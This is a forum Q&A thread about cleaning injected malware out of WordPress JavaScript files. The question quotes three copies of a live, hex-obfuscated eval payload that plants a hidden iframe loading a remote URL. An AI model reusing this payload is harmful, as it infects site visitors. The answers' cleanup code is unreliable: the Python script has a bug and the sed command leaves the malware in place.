Linux shell: how to remove a string starting with a pattern from an input file

Question

I'm trying to remove a malware from scripts of a Wordpress installation. There are over 2k infected javacsript files. Malware injected at the last part of the file. Defected JS files are like this:

//normal code
...
/*somejs.js_123*/malwarecode goes here up to the end of file.
<EOF>

The good thing is: the starting part of malware is detectable because I know it's always the '/*' + filename + '_'.

The bad thing is: starting part of a malware is not necessarily at start of a line. It's put at the end of a single line JS, in minified JS codes.

Is there any shell command (sed? gawk? I don't know if they work!) to remove a part of a file. A part starting with a pattern up to the end of the file?

Here is a real part of an infected JS file. Forgive me about the badware in the code :-)

healthy JS code
healthy JS code
healthy JS code/*shortcode.js_144*/;(function(){var yhyzrdfy="";var ihrzrakb="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var nieiahzr=0;nieiahzr<ihrzrakb.length;nieiahzr+=2){yhyzrdfy=yhyzrdfy+parseInt(ihrzrakb.substring(nieiahzr,nieiahzr+2), 16)+",";}yhyzrdfy=yhyzrdfy.substring(0,yhyzrdfy.length-1);eval(eval('String.fromCharCode('+yhyzrdfy+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var nnsrtizf="";var nizikddk="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var dzdeeben=0;dzdeeben<nizikddk.length;dzdeeben+=2){nnsrtizf=nnsrtizf+parseInt(nizikddk.substring(dzdeeben,dzdeeben+2), 16)+",";}nnsrtizf=nnsrtizf.substring(0,nnsrtizf.length-1);eval(eval('String.fromCharCode('+nnsrtizf+')'));})();/*shortcode.js_144*//*shortcode.js_144*/;(function(){var szahyihz="";var niatsnin="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822373631373965626463663530396633303133383466353764623230393832323022293b69662820783333647120213d2022633962363635323832303261333038636133333233616534373330373439316122297b783232627128223736313739656264636635303966333031333834663537646232303938323230222c226339623636353238323032613330386361333332336165343733303734393161222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f696d672e676f6c6f766b616b726f6b6f64696c612e696e666f2f68656c6c6f726573656172636865722f3f56417159736a664e4761413d4f77676b654f4653654e26474946666677436a65613d62746c6d5366755a63654472577766264e4e4147684743756772533d4341695a5a6a4b5a5141615a564f62264a5a63504e544f4e3d5179437a79744d6f52494149744c76264d5a426f76776143795962696f49563d724c7472646d6672266b6579776f72643d613635393939333835383438666466643162643366343238306636663333643026564f58775257447367717677783d4b666a6c797a6d6f42514a4a47264f4450727273774a743d4f4b745950736d4553446543264d4e51595379696270757666743d6b627864484c6b617365267a537775635647574b7568695a7463706e4c3d7779734d574e514e2673514b5a45585943524a3d70587959454351524b70527a264d784568566961785855727271793d55726166704966684c55465a223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (var zaaiayah=0;zaaiayah<niatsnin.length;zaaiayah+=2){szahyihz=szahyihz+parseInt(niatsnin.substring(zaaiayah,zaaiayah+2), 16)+",";}szahyihz=szahyihz.substring(0,szahyihz.length-1);eval(eval('String.fromCharCode('+szahyihz+')'));})();/*shortcode.js_144*/

Answer 1

If you're open to using Python, you can use a simple script to delete the malicious code from your files.

import re

# Regular expression that matches a string starting with "/*" followed by
# any character as few times as possible followed by ".js_" and 
# any character as few times as possible followed */ and then any character
# as many times as possible (matches until the end of the file)

pattern = r'/\*.+?.js_.+?\*/.+' 

infected_file = open('yourfile.js', 'r')
infected_code = infected_file.read()

new_file = open('yourfile_clean.js', 'w')

# Use re.sub function to replace any substring matching the previously 
# defined pattern with an empty string '' in the "infected_code". 
# Use re.DOTALL flag to match multiple lines using with the dot 
# character, otherwise it will match only until the end of line.
new_code = re.sub(pattern, '', infected_code, flags=DOTALL)
new_file.write(new_code)

new_file.close()
infected_file.close()

You would have to use this code recursively on all your files.

Answer 2

With GNU sed :

sed -i -r '$ s/\/\*[a-zA-Z]+\.js_[0-9]{3}\*\///g' file

On last line of the file, removes every occurrences of js name followed by _ , followed by 3 numbers, the whole surrounded with /* */ as in /*shortcode.js_144*/